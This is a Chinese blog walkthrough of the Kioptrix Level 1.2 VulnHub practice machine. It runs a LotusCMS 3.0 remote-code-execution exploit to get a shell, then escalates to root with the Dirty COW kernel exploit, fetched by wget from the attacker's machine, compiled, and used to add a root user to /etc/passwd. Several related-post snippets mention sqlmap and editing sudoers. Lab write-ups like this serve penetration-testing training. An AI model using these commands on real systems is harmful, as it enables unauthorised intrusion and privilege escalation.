Kioptrix_Level1.2靶机

于 2024-09-27 13:42:28 发布
阅读量65 收藏
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hubhubb/article/details/142591483
版权

IP扫描

端口扫描

发现为 LotusCMS

目录扫描

使用searchsploit搜索LotusCMS的历史漏洞,发现该CMS版本为3.0时存在命令执行漏洞

使用exp

GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit

构造payload

python lotuscms.py -rh 192.168.70.153 -rp 80 -lh 192.168.70.132

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

使用命令 uname -a查看靶机的内核版本信息

Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

使用命令cat /etc/*-release查看靶机的发行版本信息为

使用searchsploit查找符合内核版本和发行版本的历史漏洞

直接使用脏牛漏洞

开启8000端口

靶机下载exp

wget http://192.168.70.132:8000/40839.c

编译exp并运行

gcc -pthread 40839.c -o 40839 -lcrypt

查看/etc/passwd文件,写入firefart用户

切换为firefart用户,得到root权限

hubhubb
关注
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1092
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
KIOPTRIX: LEVEL 1.2 (#3)
Katarina__的博客
09-04 658
KIOPTRIX: LEVEL 1.2 (#3) 攻击机IP:192.168.253.143 靶机IP:192.168.253.144 一、信息收集 1、确定目标主机IP、开放端口 使用netdiscover确定网段内目标主机。 netdiscover -i eth0 -r 192.168.253.0/24 (主动探测网段内活动主机) 也可使用nmap扫固定网段 nmap -sP 192.168.253.0/24 找到ip后,可继续使用nmap探测此主机的开放端口等信息 nmap -n -
Vulnhub靶机Kioptrix_Level1.2
qq_48904485的博客
03-14 470
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
Kioptrix : Level 1.2
weixin_53626662的博客
07-31 566
F3查找 /etc/sudoers 然后在loneferrt后加,/bin/bash。发现有3.0版本漏洞,下载 lotusCMS payload。5.直接执行 sudo ht不行,看看可以执行什么。1)将收集到的url参数放到sqlmap中跑。4)查看表下字段user和accounts。3.查看/etc/passwd,有利用漏洞。7.执行 sudo /bin/bash。6.再次执行sudo ht,启动成功。获得交互式shell命令。kali监听,监听成功。3)查询数据库下的表。1.查看内核版本信息。
【vulnhub靶场】Kioptrix : Level 1.2靶机提权
qq_46421742的博客
07-26 324
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Kioptrix Level-1.2靶机
2401_84564260的博客
07-30 484
下面是 /etc/sudoers 文件的一个片段。编辑文件,以便我们可以无限制地使用 sudo。需要先在C:\windows\system32\drivers\etc\hosts映射ip。更改为 loneferret ALL=(ALL) NOPASSWD: ALL。发现url中可能存在sql注入 使用sqlmap进行测试。查看 CompanyPolicy.README文件。输入 ls 得到congrats.txt文件。使用 ls 查看更多信息 发现两个文件。检查一下sudo文件的内容。
vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场
shulao2010的博客
05-23 399
一个单机靶场,讲解了如何通过简单web漏洞获得主机root权限
【vulnhub】Kioptrix_level2 靶机
Nicky_Zheng的博客
02-01 507
1、信息收集 1.1、虚拟机发现扫描 使用netdiscover进行 arp 扫描,发现虚拟机 ip(192.168.57.140) Currently scanning: 192.168.191.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep pack
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2
LYJ20010728的博客
08-09 1244
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2环境下载KIOPTRIX: LEVEL 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 KIOPTRIX: LEVEL 1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.135 用Nmap探测一下目标靶机IP的端口
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8472
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
相机标定源代码(张正友标定法)
09-27
相机标定源代码,给自己的手机摄像头进行标定,采用张正友标定法,包含数据和源代码。
TCP/IP协议:网络通信的基石
09-27
在现代互联网时代,信息的快速、准确传递是至关重要的。TCP/IP协议族作为互联网的基础协议,扮演着连接世界各地计算机和网络设备的核心角色。本文将深入探讨TCP/IP协议的概念、组成、工作原理以及在实际应用中的代码实现。 TCP/IP协议族是现代网络通信的基石,它通过定义一套标准化的通信规则,使得全球范围内的设备能够互联互通。了解TCP/IP协议的工作原理和实际应用,对于构建可靠、高效的网络服务至关重要。随着技术的发展,TCP/IP协议也在不断地演进和优化,以满足日益复杂的网络需求和安全挑战。
基于PHP的江苏大学中非及非洲留学生社区交流网站设计源码
09-27
该项目为江苏大学定制开发的基于PHP的留学生社区交流网站源码,整合了579个文件,涵盖370个PHP脚本、76个GIF图片、31个JavaScript脚本、16个CSS样式文件、16个WOFF字体文件、15个WOFF2字体文件、12个Git忽略文件、9个JPG图片、6个PNG图片、3个JSON配置文件,旨在促进中非及非洲留学生的社区互动与交流。
汽车制造行业工业互联网智能工厂解决方案
最新发布
09-27
汽车制造行业工业互联网智能工厂解决方案 自动运行的物流仓储系统 自动化立体库与RFID标签 搬运的智能化AGV 从需求到供给的价值链整合 库存量最优化 更快的流通速度
excel统计分析案例(1):列联表分析与卡方检验
09-27
excel统计分析案例(1):列联表分析与卡方检验
基于asp.net的大学生就业管理系统设计与实现.docx
09-27
基于asp.net的大学生就业管理系统设计与实现.docx
学生选课系统代码系统 Springboot学生选课系统(程序,中文注释)
09-27
学生选课系统-学生选课系统-学生选课系统-学生选课系统-学生选课系统-学生选课系统-学生选课系统-学生选课系统-学生选课系统-学生选课系统-学生选课系统-学生选课系统 1、资源说明:学生选课系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、MVC ⑤ 开发环境:IDE
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值